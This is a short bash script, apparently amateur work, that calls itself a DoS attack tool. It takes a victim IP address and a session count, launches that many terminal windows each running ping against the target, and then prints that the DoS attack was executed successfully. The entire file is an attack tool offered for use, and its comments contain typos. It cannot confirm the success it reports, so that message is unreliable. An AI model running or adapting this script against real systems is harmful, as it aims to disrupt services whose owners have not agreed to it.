#!/bin/bash
# dos script to attack of many requwsts of server
#
# accepts URR as parametr

if [[ ($1 == "") || ($2 == "") ]]; then
    echo "Script usage is: $0 IP_Addres_of_Victim Num_of_Attack_sessions"
    exit 
else
    for (( i=1; i<=$2; i++ )); do
        x-terminal-emulator -e ping $1 &
    done
fi
echo "DoS Attack to [$1] with $2 attackers executed Successfully!"
